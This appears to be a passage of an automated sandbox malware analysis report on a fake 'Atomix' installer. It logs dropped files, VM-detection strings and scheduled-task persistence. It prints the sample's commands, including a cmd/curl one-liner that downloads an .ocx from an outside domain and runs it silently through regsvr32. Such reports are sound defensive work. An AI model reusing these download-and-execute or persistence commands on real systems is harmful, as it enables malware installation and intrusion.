    Source: Install.exe.21.drStatic PE information: section name: hydrated
    Source: 219880.ocx.30.drStatic PE information: section name: .fptable
    Source: C:\Users\user\Desktop\1.exeCode function: 4_3_05403F45 push es; ret 4_3_05403F48
    Source: C:\Users\user\Desktop\1.exeCode function: 4_3_05403F45 push es; ret 4_3_05403F48
    Source: C:\Users\user\Desktop\1.exeCode function: 4_3_05403F45 push es; ret 4_3_05403F48
    Source: C:\Users\user\Desktop\1.exeCode function: 4_3_05403F49 push es; iretd 4_3_05403F64
    Source: C:\Users\user\Desktop\1.exeCode function: 4_3_05403F49 push es; iretd 4_3_05403F64
    Source: C:\Users\user\Desktop\1.exeCode function: 4_3_05403F49 push es; iretd 4_3_05403F64
    Source: C:\Users\user\Desktop\1.exeCode function: 4_3_05403FF5 push es; ret 4_3_05403FF8
    Source: C:\Users\user\Desktop\1.exeCode function: 4_3_05403FF5 push es; ret 4_3_05403FF8
    Source: C:\Users\user\Desktop\1.exeCode function: 4_3_05403FF5 push es; ret 4_3_05403FF8
    Source: C:\Users\user\Desktop\1.exeCode function: 4_3_0537C8F5 push es; iretd 4_3_0537C8F6
    Source: C:\Users\user\Desktop\1.exeCode function: 4_3_053782F8 push ebp; ret 4_3_053782F9
    Source: C:\Users\user\Desktop\1.exeCode function: 4_3_0537C350 pushad ; retf 4_3_0537C351
    Source: C:\Users\user\Desktop\1.exeCode function: 4_3_05391E7E pushfd ; ret 4_3_05391E7F
    Source: C:\Users\user\Desktop\1.exeCode function: 4_3_05391E7E pushfd ; ret 4_3_05391E7F
    Source: C:\Users\user\Desktop\1.exeCode function: 4_3_05393EA0 push ecx; ret 4_3_05393EA1
    Source: C:\Users\user\Desktop\1.exeCode function: 4_3_05393EA0 push ecx; ret 4_3_05393EA1
    Source: C:\Users\user\Desktop\1.exeCode function: 4_3_05378EE0 push FFFFFFAAh; iretd 4_3_05379952
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_0086E360 push ecx; mov dword ptr [esp], ecx11_2_0086E361
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00A854E7 push ecx; ret 11_2_00A854FA
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_0089157A push 8BFFFFFEh; iretd 11_2_0089158C
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00991750 push ecx; mov dword ptr [esp], 3F800000h11_2_009918AC
    Source: C:\Program Files (x86)\Main\MainSoftware.exeCode function: 16_2_00007FF7797FC37C push eax; ret 16_2_00007FF7797FC37D
    Source: C:\Program Files (x86)\Main\MainSoftware.exeCode function: 16_2_00007FF7797F180D push ecx; ret 16_2_00007FF7797F181C
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\lzmaextractor.dllJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\shi56C1.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5903.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7AA9.tmpJump to dropped file
    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Program Files (x86)\Atomix\Addons\Surfclub\Install.exe (copy)Jump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI59B1.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7B27.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSIB81.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8914.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\ShortcutFlags.dllJump to dropped file
    Source: C:\Program Files (x86)\Main\MainSoftware.exeFile created: C:\Program Files (x86)\Main\Chop\Install.exeJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSICFE.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSIC5F.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5A00.tmpJump to dropped file
    Source: C:\Windows\System32\curl.exeFile created: C:\Users\user\AppData\Local\Temp\219880.ocxJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSIC9E.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSIC2F.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSIEA6.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSIEE5.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSIBE0.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\ProgramFilesFolder\Main\MainSoftware.exeJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\shiA18.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSICCE.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSID4D.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSIAC4.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Main\MainSoftware.exeJump to dropped file
    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Program Files (x86)\Atomix\Addons\Surfclub\Install.exe.partJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7B86.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5971.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Addons\SoftwareDistributor.exeJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF15.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5903.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7AA9.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI59B1.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7B27.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8914.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5A00.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7B86.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5971.tmpJump to dropped file
    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Program Files (x86)\Atomix\Addons\Surfclub\Install.exe.partJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Addons\Surfclub\How to uninstall.txtJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\How to uninstall.txtJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Atomix\Addons\Surfclub\How to uninstall.txtJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Atomix\How to uninstall.txtJump to behavior

    Boot Survival

    barindex
    Uses schtasks.exe or at.exe to add and modify task schedules
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /f
    Source: C:\Users\user\Desktop\1.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 BlobJump to behavior
    Source: C:\Users\user\Desktop\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Program Files (x86)\Main\MainSoftware.exeMemory allocated: 2349ED30000 memory reserve | memory write watchJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeMemory allocated: 27D34670000 memory reserve | memory write watch
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeMemory allocated: 24A510D0000 memory reserve | memory write watch
    Source: C:\Program Files (x86)\Main\Chop\Install.exeMemory allocated: 2C1E2E20000 memory reserve | memory write watch
    Source: C:\Program Files\Surfclub\Install.exeMemory allocated: 2488F1C0000 memory reserve | memory write watch
    Source: C:\Program Files\Surfclub\Install.exeMemory allocated: 19148520000 memory reserve | memory write watch
    Source: C:\Program Files (x86)\Main\MainSoftware.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files\Surfclub\Install.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files\Surfclub\Install.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files (x86)\Main\MainSoftware.exeWindow / User API: threadDelayed 8539
    Source: C:\Program Files (x86)\Main\MainSoftware.exeWindow / User API: threadDelayed 698
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\lzmaextractor.dllJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi56C1.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5903.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7AA9.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI59B1.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7B27.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI8914.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIB81.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\ShortcutFlags.dllJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICFE.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC5F.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5A00.tmpJump to dropped file
    Source: C:\Windows\System32\curl.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\219880.ocxJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC9E.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC2F.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIEA6.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIEE5.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBE0.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICCE.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shiA18.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID4D.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAC4.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7B86.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5971.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF15.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_11-40918
    Source: C:\Users\user\Desktop\1.exeAPI coverage: 8.3 %
    Source: C:\Program Files (x86)\Main\MainSoftware.exeAPI coverage: 0.0 %
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 940Thread sleep count: 282 > 30Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 1244Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 476Thread sleep count: 184 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 476Thread sleep count: 176 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 5608Thread sleep count: 202 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 8004Thread sleep count: 34 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 476Thread sleep count: 8539 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 6892Thread sleep count: 698 > 30
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe TID: 4076Thread sleep count: 282 > 30
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe TID: 4076Thread sleep count: 56 > 30
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe TID: 5276Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files\Surfclub\Install.exe TID: 2636Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files\Surfclub\Install.exe TID: 4780Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\Users\user\AppData\Roaming FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923 FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923 FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923 FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923 FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923 FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_009B5800 FindFirstFileW,GetLastError,FindClose,11_2_009B5800
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00873CB0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,11_2_00873CB0
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_008931C0 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,11_2_008931C0
    Source: C:\Program Files (x86)\Main\MainSoftware.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files\Surfclub\Install.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files\Surfclub\Install.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\
    Source: 1.exe, 0000000B.00000003.1513962174.000000000509E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: 1.exe, 00000004.00000003.1315095135.0000000009710000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: HKEY_USERSRegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1VMware20,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\*.*Failed to delete directory: LastError= Failed to delete file: shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
    Source: MainSoftware.exe, 00000010.00000002.2142070466.0000027536333000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00A89823 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00A89823
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_009C0430 LoadLibraryW,GetProcAddress,FreeLibrary,FreeLibrary,11_2_009C0430
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00A8420E mov esi, dword ptr fs:[00000030h]11_2_00A8420E
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00877060 GetProcessHeap,HeapFree,11_2_00877060
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_008A0100 __set_se_translator,SetUnhandledExceptionFilter,11_2_008A0100
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00893170 __set_se_translator,SetUnhandledExceptionFilter,11_2_00893170
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00A89823 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00A89823
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00A84D5E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00A84D5E
    Source: C:\Program Files (x86)\Main\MainSoftware.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 149.154.167.220 443
    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 172.67.184.211 443
    Source: C:\Users\user\Desktop\1.exeProcess created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe" /i "C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Atomix" SECONDSEQUENCE="1" CLIENTPROCESSID="7448" CHAINERUIPROCESSID="7448Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_DETECTED_ADMIN_USER="1" AI_SETUPEXEPATH="C:\Users\user\Desktop\1.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1741399570 " TARGETDIR="C:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\1.exe" AI_INSTALL="1"Jump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://qb-hos.pages.dev/page-2/?source_id=6Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /fJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /run /tn "MyPersistentApp_Hourly"Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Program Files (x86)\Main\Chop\Install.exe "C:\Program Files (x86)\Main\Chop\Install.exe"
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f
    Source: C:\Program Files (x86)\Main\Chop\Install.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!""
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --ssl-no-revoke https://wetransfers.io/v.php -o "C:\Users\user\AppData\Local\Temp\219880.ocx"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\219880.ocx"
    Source: C:\Users\user\Desktop\1.exeProcess created: C:\Users\user\Desktop\1.exe "c:\users\user\desktop\1.exe" /i "c:\users\user\appdata\roaming\atomix\atomix 1.0.0\install\69b1923\distributor software.msi" ai_euimsi=1 appdir="c:\program files (x86)\atomix" secondsequence="1" clientprocessid="7448" chaineruiprocessid="7448chainer" action="install" executeaction="install" clientuilevel="0" addlocal="mainfeature" primaryfolder="appdir" rootdrive="c:\" ai_detected_admin_user="1" ai_setupexepath="c:\users\user\desktop\1.exe" setupexedir="c:\users\user\desktop\" exe_cmd_line="/exenoupdates /forcecleanup /wintime 1741399570 " targetdir="c:\" ai_setupexepath_original="c:\users\user\desktop\1.exe" ai_install="1"
